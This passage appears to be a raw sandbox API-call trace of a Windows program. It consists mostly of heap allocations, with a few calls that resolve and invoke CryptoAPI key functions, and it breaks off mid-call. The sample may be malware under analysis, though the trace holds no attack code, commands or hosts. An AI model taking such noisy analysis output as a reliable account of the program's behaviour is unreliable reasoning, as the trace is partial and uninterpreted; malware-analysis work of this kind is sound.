RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.477] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0093.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4ac0) returned 0x4516010 [0093.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4ac0) returned 0x451f5a0 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0093.479] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0093.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0093.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0093.479] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0093.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0093.480] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0093.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0093.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0093.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0093.480] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0093.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.481] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0093.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.482] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0093.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0093.482] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0093.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0093.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0093.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0093.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0093.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0093.486] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0093.486] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2850, 